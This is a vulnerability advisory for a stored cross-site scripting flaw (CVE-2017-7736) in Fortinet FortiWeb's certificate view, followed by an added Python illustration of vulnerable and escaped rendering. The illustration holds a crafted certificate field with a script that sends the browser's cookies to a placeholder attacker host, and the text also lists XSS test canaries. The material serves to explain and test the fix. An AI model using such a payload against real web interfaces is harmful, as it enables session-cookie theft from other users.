#VU9404 Stored cross-site scripting (XSS) in Fortinet FortiWeb


Published: 2017-11-22 | Updated: 2017-11-23

Vulnerability identifier: #VU9404

Vulnerability risk: Low

CVSSv3.1: 5.6 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2017-7736

CWE-ID: CWE-79

Exploitation vector: Network

Exploit availability: No

Vulnerable software:
Fortinet FortiWeb
Server applications / Remote management servers, RDP, SSH

Vendor: Fortinet, Inc

Description

The vulnerability allows a remote authenticated attacker to perform cross-site scripting (XSS) attacks against other users of the FortiWeb web UI.

The vulnerability is caused by insufficient validation and output encoding of certificate data on the Fortinet FortiWeb web UI Certificate View page. A remote authenticated attacker can import a specially crafted certificate; when the stored certificate is later viewed in the web UI, arbitrary HTML and script code embedded in it executes in the victim's browser (stored XSS).
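The following is an added illustration of the bug class behind this advisory, not FortiWeb's code. It assumes that a text field of the imported certificate (the Subject CN is used here as an assumption; the advisory does not say which field was affected) is placed into the Certificate View page's HTML. The constructed certificate record stands in for the parsed certificate; the vulnerable and hardened render functions are hypothetical, and the parser-based check shows how to verify that a fix actually prevents a `<script>` tag from reaching the browser.

```python
"""Stored XSS via certificate fields on a certificate view page (illustration).

Hypothetical code added to illustrate #VU9404 / CVE-2017-7736; it is not
FortiWeb's implementation. The certificate record below is constructed.
"""
import html
from html.parser import HTMLParser

# Constructed stand-in for a parsed, attacker-supplied certificate. The
# attacker fully controls the Subject when minting the certificate they import.
# Using CN as the injection point is an assumption; the advisory only says
# "specially crafted malicious certificate import".
MALICIOUS_CERT = {
    "serial": "0x1337",
    "subject": {
        "CN": '<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
        "O": "Example Corp",
    },
}


def render_cert_view_vulnerable(cert: dict) -> str:
    """Vulnerable pattern: certificate fields concatenated straight into HTML."""
    rows = "".join(
        f"<tr><td>{name}</td><td>{value}</td></tr>"
        for name, value in cert["subject"].items()
    )
    return f"<table><tr><td>Serial</td><td>{cert['serial']}</td></tr>{rows}</table>"


def render_cert_view_fixed(cert: dict) -> str:
    """Hardened pattern: every certificate-derived value is HTML-escaped at the
    point it is inserted into markup (quote=True also neutralises attribute
    breakouts, should a value ever land inside an attribute)."""
    esc = lambda s: html.escape(str(s), quote=True)  # noqa: E731
    rows = "".join(
        f"<tr><td>{esc(name)}</td><td>{esc(value)}</td></tr>"
        for name, value in cert["subject"].items()
    )
    return f"<table><tr><td>Serial</td><td>{esc(cert['serial'])}</td></tr>{rows}</table>"


class _StartTagCollector(HTMLParser):
    """Collects start tags the way a browser's tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def executable_script_present(rendered_html: str) -> bool:
    """Verification check: does a real <script> start tag survive into the
    page? Escaped text such as '&lt;script&gt;' is parsed as character data,
    not as a tag, so the hardened renderer must return False here."""
    parser = _StartTagCollector()
    parser.feed(rendered_html)
    parser.close()
    return "script" in parser.tags


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_cert_view_vulnerable),
                           ("fixed", render_cert_view_fixed)):
        page = renderer(MALICIOUS_CERT)
        print(f"{name:10s} script tag reaches browser: {executable_script_present(page)}")
```

The same check generalises to a black-box test of the real product: import a certificate whose Subject carries a unique canary such as `<script>` or `"><svg/onload=...>` in a text field, fetch the view page as a second user, and parse the response rather than grepping it, since only an unescaped tag is executable.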


Mitigation
Update to version 5.8.1 or 5.7.2.

Vulnerable software versions

Fortinet FortiWeb: 5.8.0, 5.7.0 - 5.7.1


External links
http://fortiguard.com/psirt/FG-IR-17-131


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited over the network by a remote user, but it requires valid credentials for the FortiWeb web UI (certificate import is an authenticated action).

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

